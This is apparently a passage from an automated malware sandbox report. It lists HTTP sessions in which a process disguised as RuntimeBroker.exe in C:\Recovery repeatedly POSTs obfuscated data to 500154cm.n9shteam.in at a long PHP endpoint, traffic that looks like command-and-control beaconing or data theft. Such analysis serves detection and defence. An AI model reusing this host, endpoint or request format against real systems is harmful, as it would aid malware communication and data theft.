                                                                                                            Data Raw: 02 1e 21 54 2a 3d 3c 03 35 2c 0a 55 2c 2e 25 09 26 33 20 59 3f 3b 27 00 23 2d 3c 5b 2c 55 21 55 37 2d 24 5c 27 29 25 59 23 01 0b 18 2b 28 21 5b 05 12 21 5c 37 38 2c 50 29 2c 09 01 2e 1f 05 5d 21 33 3f 5c 2d 29 05 52 3e 5f 26 0b 27 2c 0c 55 30 1f 0d 06 2f 3e 2e 14 3c 3c 27 56 23 34 2e 55 0b 11 23 1b 27 16 33 1d 34 11 0d 5b 31 07 3c 1f 35 03 22 1b 25 39 3c 57 25 3a 2c 02 31 32 2e 5a 31 31 2d 06 27 2a 2a 01 3d 07 23 10 24 3a 23 51 2d 05 2f 56 03 3d 5b 57
                                                                                                            Data Ascii: !T*=<5,U,.%&3 Y?;'#-<[,U!U7-$\')%Y#+(![!\78,P),.]!3?\-)R>_&',U0/>.<<'V#4.U#'34[1<5"%9<W%:,12.Z11-'**=#$:#Q-/V=[W


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            100 | 192.168.2.4 | 50074 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:43:36.655339956 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:37.010441065 CET | 2512 | OUT | Data Raw: 54 56 5e 51 56 5f 5c 59 5c 58 5a 51 50 5b 58 52 5b 50 5e 5a 55 58 5a 59 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TV^QV_\Y\XZQP[XR[P^ZUXZY__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'\:V"[*(%T!.'&4_5?)0!!=$>%\>=#V6+%&[!"^.-
                                                                                                            Nov 12, 2024 00:43:37.222801924 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:37.297070026 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:37 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            101 | 192.168.2.4 | 50080 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:43:37.425729036 CET | 292 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Nov 12, 2024 00:43:37.776102066 CET | 2512 | OUT | Data Raw: 54 5e 5e 54 53 5f 5c 5d 5c 58 5a 51 50 53 58 56 5b 55 5e 5d 55 59 5a 59 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: T^^TS_\]\XZQPSXV[U^]UYZY__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\':=)W!060_!')365T%.)Y=%:[! .(&[!"^.
                                                                                                            Nov 12, 2024 00:43:37.992738962 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:38.073385954 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:37 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            102 | 192.168.2.4 | 50086 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:43:38.445396900 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:38.791718006 CET | 2512 | OUT | Data Raw: 51 52 5b 57 53 58 59 52 5c 58 5a 51 50 52 58 57 5b 55 5e 51 55 5f 5a 54 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QR[WSXYR\XZQPRXW[U^QU_ZT__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'-V6])]%R5!'C0 (S)3^!(Q35\>%\ 9+5&[!"^.
                                                                                                            Nov 12, 2024 00:43:39.012022972 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:39.100905895 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:38 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            103 | 192.168.2.4 | 50092 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:43:39.268294096 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:39.619951963 CET | 2512 | OUT | Data Raw: 54 56 5e 52 56 5e 59 52 5c 58 5a 51 50 58 58 50 5b 50 5e 5c 55 58 5a 5a 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TV^RV^YR\XZQPXXP[P^\UXZZ__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$9#.[);:5<'5 Y!U*#!8%%>*:Z 3*(%&[!"^.!
                                                                                                            Nov 12, 2024 00:43:39.974097013 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:40.064920902 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:40.221590042 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:40 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            104 | 192.168.2.4 | 50103 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:43:40.356328964 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2504
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:40.759666920 CET | 2504 | OUT | Data Raw: 51 54 5b 54 53 5a 59 53 5c 58 5a 51 50 5a 58 53 5b 51 5e 50 55 5e 5a 5f 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QT[TSZYS\XZQPZXS[Q^PU^Z___B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$90))&6&A058>>#8$[)2Z#09[(5&[!"^.
                                                                                                            Nov 12, 2024 00:43:40.942455053 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:41.022089005 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:40 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            105 | 192.168.2.4 | 50108 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:43:41.170218945 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:41.526750088 CET | 2512 | OUT | Data Raw: 54 50 5b 50 53 5a 5c 5a 5c 58 5a 51 50 53 58 51 5b 52 5e 58 55 54 5a 55 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TP[PSZ\Z\XZQPSXQ[R^XUTZU__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'Y-#!>;.!=%&4Z"W*3!!W'>)\)\ !^<5&[!"^.
                                                                                                            Nov 12, 2024 00:43:41.741249084 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:41.822916031 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:41 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            106 | 192.168.2.4 | 50113 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:43:41.956615925 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            107 | 192.168.2.4 | 50114 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:43:42.191817999 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 1840
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:42.542426109 CET | 1840 | OUT | Data Raw: 54 56 5e 51 56 5e 59 59 5c 58 5a 51 50 58 58 54 5b 56 5e 5a 55 5f 5a 5a 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TV^QV^YY\XZQPXXT[V^ZU_ZZ__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'-2]>89S"/&0%;"8U(#6!8%'->>!#5_?&[!"^.!
                                                                                                            Nov 12, 2024 00:43:42.759407997 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:42.836110115 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:42 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 152
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 02 1e 22 0c 28 13 0d 13 22 05 2c 19 2e 3e 2d 0c 31 30 28 13 3f 38 3b 01 36 3e 2b 00 3b 20 39 56 20 3e 06 5a 27 3a 36 07 20 2f 21 52 3c 02 21 5b 05 12 21 17 20 3b 01 0d 29 3f 30 1c 2e 0f 33 5a 35 0e 38 05 2d 07 34 0c 3e 00 22 0b 27 05 31 0d 26 32 27 01 2e 2e 31 06 3c 3f 2b 56 21 0e 2e 55 0b 11 23 18 30 38 24 0f 23 3f 0d 5f 26 00 3b 0d 35 03 04 56 25 3a 20 1f 25 2a 2f 5d 31 0f 29 00 32 31 21 00 26 03 39 5a 2a 2a 27 59 33 3a 23 51 2d 05 2f 56 03 3d 5b 57
                                                                                                            Data Ascii: "(",.>-10(?8;6>+; 9V >Z':6 /!R<![! ;)?0.3Z58-4>"'1&2'..1<?+V!.U#08$#?_&;5V%: %*/]1)21!&9Z**'Y3:#Q-/V=[W


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            108 | 192.168.2.4 | 50115 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:43:42.315013885 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:42.667450905 CET | 2512 | OUT | [outbound payload data]
                                                                                                            Nov 12, 2024 00:43:42.885152102 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:42.960433960 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:42 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            109 | 192.168.2.4 | 50116 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:43:43.096551895 CET | 292 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Nov 12, 2024 00:43:43.454417944 CET | 2512 | OUT | [outbound payload data]
                                                                                                            Nov 12, 2024 00:43:43.663463116 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:43.743866920 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:43 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            110 | 192.168.2.4 | 50117 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:43:43.875674963 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:44.229233980 CET | 2512 | OUT | [outbound payload data]
                                                                                                            Nov 12, 2024 00:43:44.462975025 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:44.541424036 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:44 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            111 | 192.168.2.4 | 50118 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:43:44.669426918 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:45.026789904 CET | 2512 | OUT | [outbound payload data]
                                                                                                            Nov 12, 2024 00:43:45.151088953 CET | 1236 | OUT | [outbound payload data]
                                                                                                            Nov 12, 2024 00:43:45.557291031 CET | 1236 | OUT | [outbound payload data]
                                                                                                            Nov 12, 2024 00:43:45.768650055 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:45.768773079 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:45.768892050 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:45.771406889 CET | 1276 | OUT | [outbound payload data]
                                                                                                            Nov 12, 2024 00:43:46.012969971 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:45 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            112 | 192.168.2.4 | 50119 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:43:46.446635008 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:46.792510986 CET | 2512 | OUT | [outbound payload data]
                                                                                                            Nov 12, 2024 00:43:47.012706995 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:47.102960110 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:46 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            113 | 192.168.2.4 | 50120 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:43:47.231093884 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:47.589257956 CET | 2512 | OUT | [outbound payload data]
                                                                                                            Nov 12, 2024 00:43:47.816188097 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:47.899507046 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:47 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            114 | 192.168.2.4 | 50121 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:43:47.845331907 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 1840
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:48.198184967 CET | 1840 | OUT | [outbound payload data]
                                                                                                            Nov 12, 2024 00:43:48.416018009 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:48.495001078 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:48 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 152
                                                                                                            Connection: keep-alive


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                            115 | 192.168.2.4 | 50122 | 37.44.238.250 | 80 | 4076 | C:\Recovery\RuntimeBroker.exe
                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                            Nov 12, 2024 00:43:48.280769110 CET | 316 | OUT | POST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:43:48.638767958 CET | 2512 | OUT | [outbound payload data]
                                                                                                            Nov 12, 2024 00:43:48.865545988 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:43:48.946394920 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:43:48 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
